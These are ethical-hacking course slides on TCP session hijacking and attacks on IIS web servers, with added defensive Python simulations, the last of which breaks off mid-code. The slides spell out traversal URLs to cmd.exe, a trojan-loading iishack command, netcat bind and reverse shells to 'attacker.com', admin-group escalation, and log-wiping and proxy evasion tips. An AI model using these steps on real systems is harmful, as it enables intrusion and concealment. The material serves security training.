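The handshake and sequence-number rules from the two slides above, as an added simulation written for this edit (it is not course material and not a real TCP stack). It models one endpoint per side, runs the four handshake steps, and shows the receiver's check that decides whether an injected segment is accepted: a data segment is honoured only if its sequence number falls inside the receive window, so an attacker who cannot observe the session must guess a 32-bit value. The two ISN generators are constructed for the comparison: `predictable_isn` grows by a fixed step per connection (the old behaviour that made guessing easy), `random_isn` draws 32 fresh random bits, and `isn_predictability` measures how regular a generator's output is. The window size and step are assumptions.

```python
import itertools
import os
import struct

MASK = 0xFFFFFFFF          # sequence numbers are a 32-bit counter
WINDOW = 8192              # constructed receive window for this simulation

def random_isn():
    """Unpredictable ISN: 32 fresh random bits per connection."""
    return struct.unpack(">I", os.urandom(4))[0]

_counter = itertools.count(1)

def predictable_isn():
    """Old-style ISN that grows by a fixed step per connection; an observer who saw
    one value can compute the next one (step of 64000 is an assumption)."""
    return (next(_counter) * 64000) & MASK

def in_window(seq, rcv_nxt, window=WINDOW):
    """True if seq lies in [rcv_nxt, rcv_nxt + window) modulo 2**32."""
    return ((seq - rcv_nxt) & MASK) < window

class TcpEndpoint:
    """Minimal model of one side of a TCP connection: only the handshake and the
    sequence-number check on incoming data are modelled."""

    def __init__(self, isn_fn):
        self.isn_fn = isn_fn
        self.state = "CLOSED"
        self.snd_nxt = None   # next sequence number we will send
        self.rcv_nxt = None   # next sequence number we expect to receive

    def connect(self):                      # step 1: client sends SYN with its ISN
        self.snd_nxt = self.isn_fn()
        self.state = "SYN_SENT"
        return {"flags": {"SYN"}, "seq": self.snd_nxt}

    def accept_syn(self, syn):              # step 2: server answers SYN+ACK with its own ISN
        self.rcv_nxt = (syn["seq"] + 1) & MASK
        self.snd_nxt = self.isn_fn()
        self.state = "SYN_RCVD"
        return {"flags": {"SYN", "ACK"}, "seq": self.snd_nxt, "ack": self.rcv_nxt}

    def accept_synack(self, synack):        # step 3: client ACKs; the SYN consumed one number
        if synack["ack"] != (self.snd_nxt + 1) & MASK:
            raise ValueError("SYN+ACK does not acknowledge our ISN")
        self.snd_nxt = (self.snd_nxt + 1) & MASK
        self.rcv_nxt = (synack["seq"] + 1) & MASK
        self.state = "ESTABLISHED"
        return {"flags": {"ACK"}, "seq": self.snd_nxt, "ack": self.rcv_nxt}

    def accept_ack(self, ack):              # step 4: server completes the handshake
        if self.state == "SYN_RCVD" and ack["ack"] == (self.snd_nxt + 1) & MASK:
            self.snd_nxt = (self.snd_nxt + 1) & MASK
            self.state = "ESTABLISHED"

    def send(self, data):
        """Build a data segment carrying our next sequence number and advance it."""
        seg = {"flags": {"ACK"}, "seq": self.snd_nxt, "data": data}
        self.snd_nxt = (self.snd_nxt + len(data)) & MASK
        return seg

    def deliver(self, seg):
        """Accept a data segment only if its sequence number is inside the receive
        window; a segment whose number was guessed wrong is dropped."""
        if self.state != "ESTABLISHED" or not in_window(seg["seq"], self.rcv_nxt):
            return False
        self.rcv_nxt = (self.rcv_nxt + len(seg["data"])) & MASK
        return True

def three_way_handshake(client, server):
    syn = client.connect()
    synack = server.accept_syn(syn)
    ack = client.accept_synack(synack)
    server.accept_ack(ack)
    return client.state, server.state

def isn_predictability(isn_fn, samples=20):
    """Fraction of consecutive ISN differences equal to the first difference:
    1.0 means every next ISN follows from the previous one, ~0.0 means no pattern."""
    isns = [isn_fn() for _ in range(samples)]
    deltas = [(b - a) & MASK for a, b in zip(isns, isns[1:])]
    return sum(d == deltas[0] for d in deltas) / len(deltas)

if __name__ == "__main__":
    bob, server = TcpEndpoint(random_isn), TcpEndpoint(random_isn)
    print(three_way_handshake(bob, server))
    print("in-window segment accepted:", server.deliver(bob.send(b"hello")))
    forged = {"flags": {"ACK"}, "seq": (bob.snd_nxt + 50000) & MASK, "data": b"x"}
    print("guessed-wrong segment accepted:", server.deliver(forged))
    print("predictable ISN pattern:", isn_predictability(predictable_isn))
    print("random ISN pattern:", isn_predictability(random_isn))
```

The defensive reading of the simulation: with a random ISN the only way to land inside the window is to see the live traffic, which is why the countermeasures later in this module (encryption, secure protocols, limiting who can sit on the path) matter more than the sequence-number check itself.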




Programs that perform Session Hijacking

There are several programs available that perform session hijacking. Following are a few that belong to this category:

• Juggernaut
• Hunt
• TTY Watcher
• IP Watcher
• T-Sight
Hacking Tool: Juggernaut

• Juggernaut is a network sniffer that can be used to hijack TCP sessions. It runs on Linux operating systems.

• Juggernaut can be set to watch all network traffic, or it can be given a keyword like "password" to look out for.

• The main function of this program is to maintain information about the various session connections that are occurring on the network.

• The attacker can see all the sessions and pick a session he wants to hijack.
Hacking Tool: Hunt

http://lin.fsid.cvut.cz/~kra/index.html

• Hunt is a program that can be used to listen to, intercept, and hijack active sessions on a network.

• Hunt offers:
  - Connection management
  - ARP spoofing
  - Resetting connections
  - Watching connections
  - MAC address discovery
  - Sniffing TCP traffic
Hacking Tool: TTY Watcher

http://www.cerias.purdue.edu

• TTY-Watcher is a utility to monitor and control users on a single system.

• Sharing a TTY: anything the user types into a monitored TTY window will be sent to the underlying process. In this way you are sharing a login session with another user.

• After a TTY has been stolen, it can be returned to the user as though nothing happened.

(Available only for Sun Solaris systems.)
Hacking Tool: IP Watcher

http://engarde.com

• IP Watcher is a commercial session hijacking tool that allows you to monitor connections and has active countermeasures for taking over a session.

• The program can monitor all connections on a network, allowing an attacker to display an exact copy of a session in real time, just as the user of the session sees the data.
T-Sight

http://engarde.com

• T-Sight, an advanced intrusion investigation and response tool for Windows NT and Windows 2000, can assist you when an attempt at a break-in or compromise occurs.

• With T-Sight you can monitor all your network connections (i.e. traffic) in real time and observe the composition of any suspicious activity that takes place.

• T-Sight has the capability to hijack any TCP session on the network.

• For security reasons, Engarde Systems licenses this software to pre-determined IP addresses.
Remote TCP Session Reset Utility

[Screenshot: the Remote TCP Session Reset window (menu: File, Edit, Session, Help; toolbar: Export, Print, Refresh, Break, Help). Input fields: "Router, Switch or Server Name / IP" = 10.32.0.254, "Read-Write Community String" = private, and a Connect button. The session table has the columns Connection State, Server IP Address, Server Port, Client IP Address and Client Port, with one row: Established, 216.60.197.254, 23, 208.191.22.50, 3530. Status bar: "TCP Session Table download complete."]
Dangers posed by Hijacking

1. Most computers are vulnerable
2. Little can be done to protect against it
3. Hijacking is simple to launch
4. Most countermeasures do not work
5. Hijacking is very dangerous.
Protecting against Session Hijacking

1. Use encryption
2. Use a secure protocol
3. Limit incoming connections
4. Minimize remote access
5. Have strong authentication.
Summary

• In the case of session hijacking, an attacker relies on the legitimate user to connect and authenticate, and then takes over the session.

• In a spoofing attack, the attacker pretends to be another user or machine to gain access.

• Successful session hijacking is extremely difficult and only possible when a number of factors are under the attacker's control.

• Session hijacking can be active or passive in nature, depending on the degree of involvement of the attacker in the attack.

• A variety of tools exist to aid the attacker in perpetrating a session hijack.

• Session hijacking could be very dangerous and there is a need for implementing strict countermeasures.
Ethical Hacking

Module XI

Hacking Web Servers

Module Objective

• Introduction to Web Servers
• Popular Web Servers and common Vulnerabilities
• Apache Web Server Security
• Sun ONE Web Server Security
• IIS Server Security
• Attacks against Web Servers
• Tools used in Attack
• Countermeasures
How Web Servers Work

1. The browser breaks the URL into three parts:
   1. The protocol ("http")
   2. The server name ("www.website.com")
   3. The file name ("webpage.html")

2. The browser communicates with a name server, which translates the server name, www.website.com, into an IP address.

3. The browser then forms a connection to the Web server at that IP address on port 80.

4. Following the HTTP protocol, the browser sends a GET request to the server, asking for the file webpage.html.

5. The server sends the HTML text for the Web page to the browser.

6. The browser reads the HTML tags and formats the page onto the screen.
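Steps 1 to 5 of the procedure above carried out on the wire, as an added example written for this edit (not part of the course material). The client side is a raw socket so that the request line and Host header are visible, and the server side is a throw-away `http.server` instance bound to 127.0.0.1 on an OS-chosen port; the page content, the file name `webpage.html` and the use of HTTP/1.0 (so the server closes the connection when the reply is complete) are assumptions of the example.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Constructed page served by the local test server; stands in for "webpage.html".
PAGE = b"<html><head><title>demo</title></head><body><h1>Hello</h1></body></html>"

class _DemoHandler(BaseHTTPRequestHandler):
    """Step 5 from the server's side: answer a GET with the HTML text of the page."""

    def do_GET(self):
        found = self.path == "/webpage.html"
        body = PAGE if found else b"<html><body>404 Not Found</body></html>"
        self.send_response(200 if found else 404)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass

def start_demo_server():
    """Bind a throw-away HTTP server on 127.0.0.1 and an OS-chosen port."""
    server = HTTPServer(("127.0.0.1", 0), _DemoHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server

def split_url(url):
    """Step 1: break the URL into protocol, server name (plus port) and file name."""
    parts = urlsplit(url)
    return parts.scheme, parts.hostname, parts.port or 80, parts.path or "/"

def build_get_request(host, path):
    """Step 4: the request line and the Host header, terminated by a blank line."""
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")

def fetch(url):
    """Steps 2-5: resolve the name, open a TCP connection, send GET, read the reply.
    Returns (status_code, headers_dict, body_bytes)."""
    scheme, host, port, path = split_url(url)
    if scheme != "http":
        raise ValueError("only plain http is modelled here")
    address = socket.gethostbyname(host)                       # step 2: name -> IP
    with socket.create_connection((address, port)) as sock:    # step 3: TCP connection
        sock.sendall(build_get_request(host, path))            # step 4: GET request
        chunks = []
        while True:                                            # HTTP/1.0: read until close
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    raw = b"".join(chunks)
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body

if __name__ == "__main__":
    srv = start_demo_server()
    port = srv.server_address[1]
    print(fetch(f"http://127.0.0.1:{port}/webpage.html"))
    srv.shutdown()
```

Everything the server learns about the client is in those request bytes, which is the reason the request screening described later in this module works on exactly this text.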



Popular Web Servers and Common Security Threats

• Apache Web Server

• IIS Web Server

• Sun ONE Web Server

• Nature of Security Threats in a Web Server Environment:
  - Bugs or Web Server Misconfiguration.
  - Browser-Side or Client-Side Risks.
  - Sniffing
  - Denial of Service Attack.
Apache Vulnerability

• Apache Week tracks the vulnerabilities in Apache Server. Even Apache has its share of bugs and fixes.

• For instance, consider the vulnerability which was found in the Win32 port of Apache 1.3.20.
  - Long URLs passing through the mod_negotiation, mod_dir and mod_autoindex modules could cause Apache to list directory contents.
  - The concept is simple but requires a few trial runs.
  - A URL with a large number of trailing slashes:
    - /cgi-bin/////////////////////////////// could produce a directory listing of the original directory.
Attacks against IIS

• IIS is one of the most widely used Web server platforms on the Internet.

• Microsoft's Web Server has been a frequent target over the years.

• It has been attacked through various vulnerabilities. Examples include:
  - ::$DATA vulnerability
  - showcode.asp vulnerability
  - Piggybacking vulnerability
  - Privileged command execution
  - Buffer Overflow exploits (IIShack.exe)
IIS Components

• IIS relies heavily on a collection of DLLs that work together with the main server process, inetinfo.exe, to provide various capabilities.

• Examples: server-side scripting, content indexing, Web-based printing, etc.

• This architecture provides attackers with different functionality to exploit via malicious input.
ISAPI DLL Buffer Overflows

• One of the most extreme security vulnerabilities associated with ISAPI DLLs is the buffer overflow.

• In 2001, IIS servers were ravaged by versions of the Code Red and Nimda worms, which were both based on buffer overflow exploits.
IPP Printer Overflow

• There is a buffer overflow in IIS within the ISAPI filter that handles .printer files (c:\winnt\system32\msw3prt.dll), which provides support for the Internet Printing Protocol (IPP).

• IPP enables the web-based control of various aspects of networked printers.

• The vulnerability arises when a buffer of approximately 420 bytes is sent within the HTTP Host header:

  GET /NULL.printer HTTP/1.0
  Host: [buffer]
Hacking Tool: IISHack.exe

• iishack.exe overflows a buffer used by the IIS http daemon, allowing arbitrary code to be executed.

  c:\>iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe

• www.yourtarget.com is the IIS server you're hacking, 80 is the port it's listening on, www.yourserver.com is some web server with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.

[Screenshot: iishack run without arguments]

IIS 4.0 remote buffer overflow exploit
(c) dark spyrit -- barns@eeye.com
http://www.eEye.com

[usage: iishack <host> <port> <url>]

eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!

No host or IP specified.
IPP Buffer Overflow Countermeasures

• Install the latest service pack from Microsoft.

• Remove IPP printing from the IIS server.

• Install a firewall and remove unused extensions.

• Implement aggressive network egress filtering.

• Use the IISLockdown and URLScan utilities.

• Regularly scan your network for vulnerable servers.

ISAPI DLL Source Disclosures

• Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be inaccessible.

• This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc.) file.

• Appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.
ISAPI.DLL Exploit

• Here's a sample file called htr.txt that you can pipe through netcat to exploit the ISAPI.DLL vulnerability:

  GET /site1/global.asa+.htr HTTP/1.0
  [CRLF]
  [CRLF]

• Piping it through netcat connected to a vulnerable server produces the following results:

  c:\>nc -v www.victim.com 80 <htr.txt
  HTTP/1.1 200 OK
  Server: Microsoft-IIS/5.0

  <!--filename = global.asa -->
  ("Profiles_ConnectionString") "DSN=Profiles; UID=Company_user; password=secret"

[Callout in the screenshot: "Password Revealed", pointing at the password value in the disclosed source.]
IIS Directory Traversal

• The vulnerability results from a canonicalization error affecting CGI scripts and ISAPI extensions (.ASP is probably the best known ISAPI-mapped file type).

• Canonicalization is the process by which various equivalent forms of a name are resolved to a single, standard name.

• For example, "%c0%af" and "%c1%9c" are overlong representations for "/" and "\".

• Thus, by feeding an HTTP request like the following to IIS, arbitrary commands can be executed on the server:

  GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
Unicode

• ASCII characters for the dots are replaced with the hexadecimal equivalent (%2E).

• ASCII characters for the slashes are replaced with the Unicode equivalent (%c0%af).

• Unicode 2.0 allows multiple encoding possibilities for each character.

• Unicode for "/": 2f, c0af, e080af, f08080af, f8808080af, ...

• Overlong Unicode is NOT malformed, but it is not allowed by a correct Unicode encoder and decoder.

• It is maliciously used to bypass filters that only check short Unicode.
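The canonicalization error from the two slides above, as an added example written for this edit (it is not course material and not IIS code). `lenient_utf8_decode` is a constructed decoder that honours any lead byte and therefore maps every overlong form (c0 af, e0 80 af, ...) to "/", which is the behaviour a vulnerable server had; `strict_utf8_decode` is Python's own decoder, which enforces shortest form and rejects them. `canonicalize_request_path` is the defender's side: decode until the path is stable (so a double-encoded %255c is unwrapped), refuse anything that only a lenient decoder accepts, fold backslashes, collapse dot segments, and only then check that the result is still under the web root. The web root `/scripts` and the three-round decoding limit are assumptions.

```python
import posixpath
from urllib.parse import unquote_to_bytes

def lenient_utf8_decode(data):
    """Decode UTF-8 the way a decoder WITHOUT the shortest-form rule does: any lead
    byte is honoured, so the overlong sequences c0 af, e0 80 af, f0 80 80 af all
    become '/'. Returns None only for structurally invalid input. Illustration of the
    flaw only; never use this to decode untrusted input."""
    out, i = [], 0
    while i < len(data):
        lead = data[i]
        if lead < 0x80:
            n, cp = 1, lead
        elif 0xC0 <= lead < 0xE0:
            n, cp = 2, lead & 0x1F
        elif 0xE0 <= lead < 0xF0:
            n, cp = 3, lead & 0x0F
        elif 0xF0 <= lead < 0xF8:
            n, cp = 4, lead & 0x07
        elif 0xF8 <= lead < 0xFC:
            n, cp = 5, lead & 0x03
        elif 0xFC <= lead < 0xFE:
            n, cp = 6, lead & 0x01
        else:
            return None
        if i + n > len(data):
            return None
        for cont in data[i + 1:i + n]:
            if cont & 0xC0 != 0x80:      # every trailing byte must be 10xxxxxx
                return None
            cp = (cp << 6) | (cont & 0x3F)
        if cp > 0x10FFFF:
            return None
        out.append(chr(cp))
        i += n
    return "".join(out)

def strict_utf8_decode(data):
    """Python's decoder enforces shortest form: overlong sequences are rejected."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None

def canonicalize_request_path(raw_path, webroot="/scripts", max_rounds=3):
    """Reduce a request path to one canonical form BEFORE any access decision.
    Returns ("ok", path) or ("reject", reason)."""
    current = raw_path
    for _ in range(max_rounds):              # percent-decode until stable (double encoding)
        decoded_bytes = unquote_to_bytes(current)
        decoded = strict_utf8_decode(decoded_bytes)
        if decoded is None:
            if lenient_utf8_decode(decoded_bytes) is not None:
                return ("reject", "overlong-utf8")   # only a lenient decoder accepts it
            return ("reject", "invalid-utf8")
        if decoded == current:
            break
        current = decoded
    if "%" in current:
        return ("reject", "too-many-encoding-layers")
    path = posixpath.normpath(current.replace("\\", "/"))   # fold '\' and '..' segments
    if path != webroot and not path.startswith(webroot + "/"):
        return ("reject", "traversal")
    return ("ok", path)

if __name__ == "__main__":
    for raw in ("/scripts/..%c0%af../winnt/system32/cmd.exe",
                "/scripts/..%255c../winnt/system32/cmd.exe",
                "/scripts/hello.asp"):
        print(raw, "->", canonicalize_request_path(raw))
```

The order matters: a filter that looks for "../" in the raw request, or that decodes once and then checks, passes both of the rejected inputs above, which is exactly the bypass the Unicode slide describes.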
IIS Logs

• IIS logs all the visits in log files. The log file is located at <%systemroot%>\logfiles

• Be careful. If you don't use a proxy, then your IP will be logged.

• This command lists the log files:

  http://victim.com/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Winnt\system32\Logfiles\W3SVC1
Hacking Tool: IISxploit.exe

This tool automates the directory traversal exploit in IIS.

[Screenshot: the IISxploit.exe window with fields for the vulnerable server, "Upload File", "File to run (e.g. ...)", "File to rename (whole address)" with "Rename to:", "File to Delete (whole address)", and a "Click Here" link to the author's GeoCities page.]
Hacking Tool: execiis-win32.exe

This tool exploits the IIS directory traversal vulnerability: it takes a command from the command prompt and executes it on the IIS server.

[Screenshot: Command Prompt window titled "C:\WINDOWS\System32\cmd.exe - execiis-win32 juggyboy.com dir c:\"]

C:\Documents and Settings\Owner\My Documents\Ethical Hacking Lab Files v2\Module 11 - Hacking Web Servers>execiis-win32 juggyboy.com dir c:\
iisexec.c : Microsoft IIS CGI Filename Decode Error ! <filip@securax.be>

-- Socket created.

-- Connection made.

[GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+
]
Hacking Tool: Unicodeuploader.pl

• The Unicode upload creator (unicodeloader.pl) works as follows:

  Two files (upload.asp and upload.inc; have them in the same directory as the PERL script) are built in the webroot (or anywhere else) using echo and some conversion strings. These files allow you to upload any file by simply surfing with a browser to the server.

  1. Find the webroot
  2. perl unicodeloader target:80 'webroot'
  3. Surf to target/upload.asp and upload nc.exe
  4. perl unicodexecute3.pl target:80 'webroot/nc -l -p 80 -e cmd.exe'
  5. telnet target 80

  The above procedure will drop you into the shell on the box.
Hacking Tool: cmdasp.asp

• After uploading nc.exe to the web server, you can shovel a shell back to your PC.

• Shoveling a shell back to the attacker's system is easy:

  1. Start a netcat listener on the attacker's system:
     c:\>nc.exe -l -p 2002

  2. Use cmdasp.asp to shovel a netcat shell back to the listener:
     c:\inetpub\scripts\nc.exe -v -e cmd.exe attacker.com 2002
Escalating Privileges on IIS

• On IIS 4, the LPC ports can be exploited using hk.exe.

• hk.exe will run commands using the SYSTEM account on Windows, allowing intruders to simply add the IUSR or IWAM account to the local Administrators group:

  hk.exe net localgroup administrators IUSR_machinename /add

• Note: the LPC port vulnerability is patched on IIS 5.0.
Hacking Tool: iiscrack.dll

• iiscrack.dll works like upload.asp and cmd.asp.

• iiscrack.dll provides a form-based input for attackers to enter commands to be run with SYSTEM privileges.

• An attacker could rename iiscrack.dll to idq.dll, upload the trojan DLL to c:\inetpub\scripts using upload.asp and execute it via the web browser using:

  http://victim.com/scripts/idq.dll

• The attacker now has the option to run virtually any command as SYSTEM.
Hacking Tool: ispc.exe

• ISPC.exe is a Win32 client that is used to connect to a trojan ISAPI DLL (idq.dll).

• Once the trojan DLL is copied to the victim web server (/scripts/idq.dll), the attacker can execute ispc.exe and immediately obtain a remote shell running as SYSTEM.

  c:\>ispc.exe victim.com/scripts/idq.dll 80
Unspecified Executable Path Vulnerability

• When executables and DLL files are not preceded by a path in the registry (e.g. explorer.exe does not have a fixed path by default),

• Windows NT 4.0/2000 will search for the file in the following locations, in this order:
  - the directory from which the application loaded,
  - the current directory of the parent process,
  - ...\system32
  - ...\system
  - the Windows directory
  - the directories specified in the PATH environment variable
Hacking Tool: CleanIISLog

• This tool clears the log entries in the IIS log files, filtered by IP address.

• An attacker can easily cover his trace by removing entries based on his IP address in the W3SVC log files.

[Screenshot: a log file open in Notepad, with entries such as the following (the source address 4.5.6.7 is the one an attacker would filter on):]

Jun 10 12:53:37.349 4.5.6.7 op=GET arg=http://TargetIP/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\*.cif/s/b result="500 Server Error"
Jun 10 12:53:39.675 4.5.6.7 op=GET arg=http://TargetIP/d.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not Found"
Jun 10 12:53:43.573 4.5.6.7 op=GET arg=http://TargetIP/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not Found"
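The defender's view of the log entries shown above and on the IIS Logs slide, as an added example written for this edit (not course material, and not the format of a real IIS W3C log; the lines are constructed in the same shape as the screenshot). `scan_log` parses each line, decodes the request twice (so the %255c double encoding is unwrapped) and reports the traversal indicators it finds, and `hits_by_source` turns that into the per-address count an analyst would look at. `chain_digest` addresses CleanIISLog directly: a running hash over the lines that is shipped off the web server as it is written makes the removal of any entry detectable, because the digest recomputed from the edited file no longer matches. Indicator names and the sample addresses are assumptions.

```python
import hashlib
import re
from urllib.parse import unquote

# Constructed log lines in the same shape as the slide's screenshot (not a real capture).
SAMPLE_LOG = """\
Jun 10 12:53:37.349 4.5.6.7 op=GET arg=http://TargetIP/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\\*.cif/s/b result="500 Server Error"
Jun 10 12:53:39.675 4.5.6.7 op=GET arg=http://TargetIP/d.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not Found"
Jun 10 12:53:43.573 4.5.6.7 op=GET arg=http://TargetIP/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not Found"
Jun 10 12:54:01.002 10.0.0.8 op=GET arg=http://TargetIP/default.asp result="200 OK"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \d{1,2} [\d:.]+) (?P<src>\S+) op=(?P<op>\S+) '
    r'arg=(?P<arg>\S+) result="(?P<result>[^"]*)"$'
)

def indicators_for(arg):
    """Return the traversal indicators present in one request URL."""
    found = []
    lower = arg.lower()
    if "%25" in lower:                        # %25 is an encoded '%': double encoding
        found.append("double-encoding")
    if re.search(r"%c[01]%|%e0%80", lower):   # c0/c1 leads and e0 80 never occur in valid UTF-8
        found.append("overlong-utf8")
    decoded = unquote(unquote(arg, errors="replace"), errors="replace")
    if "../" in decoded or "..\\" in decoded:
        found.append("dot-dot-traversal")
    if "cmd.exe" in decoded.lower():
        found.append("shell-invocation")
    return found

def scan_log(text):
    """Parse every line and return the suspicious ones with their indicators."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                          # unparseable lines are skipped, not trusted
        found = indicators_for(m["arg"])
        if found:
            hits.append({"ts": m["ts"], "src": m["src"],
                         "result": m["result"], "indicators": found})
    return hits

def hits_by_source(hits):
    counts = {}
    for h in hits:
        counts[h["src"]] = counts.get(h["src"], 0) + 1
    return counts

def chain_digest(lines):
    """Tamper-evident hash chain over the log: each digest covers the previous digest
    plus the current line, so deleting or editing any line changes the final value.
    Ship the running digest (or the lines themselves) off the web server as written."""
    digest = hashlib.sha256(b"").digest()
    for line in lines:
        digest = hashlib.sha256(digest + line.encode("utf-8")).digest()
    return digest.hex()

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["src"], h["result"], ",".join(h["indicators"]))
    print("hits per source:", hits_by_source(hits))
    lines = SAMPLE_LOG.splitlines()
    cleaned = [l for l in lines if "4.5.6.7" not in l]
    print("digest survives cleaning:", chain_digest(cleaned) == chain_digest(lines))
```

Note that the "404" results are as interesting as the "500": a run of failed requests for winnt/repair/sam from one address is the probing that precedes a working traversal, and it is only visible if the log is still intact.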
File System Traversal Countermeasures

• Microsoft recommends setting the NTFS ACLs on cmd.exe and several other powerful executables to Administrators and SYSTEM: Full Control only.

• Remove execute permission for the IUSR account.

• This should stop directory traversal in IIS.

• Apply Microsoft patches and hotfixes regularly.
Solution: UpdateExpert

• UpdateExpert is a Windows administration program that helps you secure your systems by remotely managing service packs and hot fixes.

• Microsoft constantly releases updates for the OS and mission-critical applications, which fix security vulnerabilities and system stability problems.

• UpdateExpert enhances security, keeps systems up to date, eliminates sneaker-net, and improves system reliability and QoS.

cacls.exe utility

• The built-in Windows 2000 utility cacls.exe can set access control list (ACL) permissions globally.

• Let's say you want to change permissions on all executable files to System:Full, Administrators:Full:

  C:\>cacls.exe c:\myfolder\*.exe /T /G System:F Administrators:F

[Screenshot: Command Prompt]

  C:\Snort>cacls.exe *.exe /T /G System:F Administrators:F
  Are you sure (Y/N)?y
  processed file: C:\Snort\snort.exe

  C:\Snort>
Network Tool: Whisker

• Whisker is an automated vulnerability scanning software which scans for the presence of exploitable files on remote Web servers.

• Refer to the output of the simple scan given below and you will see that Whisker has identified several potentially dangerous files on this IIS 5 server:

  c:\>whisker.pl -h victim.com -s scan.db

  = Host: victim.com
  = Server: Microsoft-IIS/5.0

  + 200 OK: GET /whisker.ida
  + 200 OK: GET /whisker.idq
  + 200 OK: HEAD /_vti_inf.html
  + 200 OK: HEAD /_vti_bin/shtml.dll
  + 200 OK: HEAD /_vti_bin/shtml.exe
http://www.nstalker.com/nstealth/

• N-Stealth 5 is an impressive Web vulnerability scanner that scans for over 18000 HTTP security issues.

• Stealth HTTP Scanner writes scan results to an easy HTML report.

• N-Stealth is often used by security companies for penetration testing and system auditing, specifically for testing Web servers.
Hacking Tool: WebInspect

• WebInspect is an impressive Web server and application-level vulnerability scanner which scans for over 1500 known attacks.

• It checks site contents and analyzes them for rudimentary application issues like smart guesswork checks, password guessing, parameter passing, and hidden parameter checks.

•  It can analyze a basic Web server in 4 minutes, cataloging over 1500 HTML pages.
Network Tool: Shadow Security Scanner

http://www.safety-lab.com

• Shadow Security Scanner is designed to identify known and unknown vulnerabilities, suggest fixes to identified vulnerabilities, and report possible security holes within a network's internet, intranet and extranet environments.

• Shadow Security Scanner includes vulnerability auditing modules for many systems and services.

• These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP, LDAP, TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing extensions, MSSQL, IBM DB2, Oracle, MySQL, PostgreSQL, Interbase, MiniSQL and more.
Countermeasures

• IISLockdown:
  - IISLockdown restricts anonymous access to system utilities as well as the ability to write to Web content directories.
  - It disables Web Distributed Authoring and Versioning (WebDAV).
  - It installs the URLScan ISAPI filter.

• URLScan:
  - URLScan is a security tool that screens all incoming requests to the server by filtering the requests based on rules that are set by the administrator.
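A request screen of the kind URLScan applies, as an added example written for this edit (it is not URLScan's code and not course material). `parse_request` splits a raw request head into method, target, version and headers, and `screen_request` applies a constructed policy in a fixed order: allowed methods, URL length, high-bit bytes after one round of percent-decoding, ".." anywhere in the path, a deny-list of extensions, and a cap on header length. The deny-list holds the four extensions named on the preceding slides (.printer, .htr, .ida, .idq), and the header cap of 128 bytes is chosen to sit well below the roughly 420 bytes the IPP overflow slide describes, so the same rule stops the "+.htr" source disclosure, the .printer overflow and the traversal requests; all four limits are assumptions.

```python
from urllib.parse import unquote_to_bytes

# Constructed policy, modelled on the kind of rules an administrator sets in URLScan.
ALLOWED_METHODS = {"GET", "HEAD", "POST"}
DENIED_EXTENSIONS = {".printer", ".htr", ".ida", ".idq"}   # extensions named on these slides
MAX_URL_LENGTH = 260
MAX_HEADER_LENGTH = 128     # well below the ~420 bytes needed by the IPP overflow

def parse_request(raw):
    """Split a raw HTTP request head into (method, target, version, headers).
    Raises ValueError on anything that is not a well-formed request head."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        raise ValueError("malformed request line")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            raise ValueError("malformed header line")
        headers.append((name.strip().decode("ascii", "replace"), value.strip()))
    method = parts[0].decode("ascii", "replace")
    version = parts[2].decode("ascii", "replace")
    return method, parts[1], version, headers

def screen_request(raw):
    """Apply the policy in order; return ("allow", "") or ("deny", reason)."""
    try:
        method, target, _version, headers = parse_request(raw)
    except ValueError as exc:
        return ("deny", f"malformed: {exc}")
    if method not in ALLOWED_METHODS:
        return ("deny", "method-not-allowed")
    if len(target) > MAX_URL_LENGTH:
        return ("deny", "url-too-long")
    path = unquote_to_bytes(target.split(b"?", 1)[0])     # normalise once before scanning
    if any(b > 0x7F for b in path):                       # %c0%af and friends land here
        return ("deny", "high-bit-byte-in-url")
    if b".." in path:                                     # catches %255c after one decode too
        return ("deny", "dot-dot-in-url")
    last = path.rsplit(b"/", 1)[-1]
    extension = last[last.rfind(b"."):].lower() if b"." in last else b""
    if extension.decode("ascii", "replace") in DENIED_EXTENSIONS:
        return ("deny", "extension-denied")               # "global.asa+.htr" ends in .htr
    for name, value in headers:
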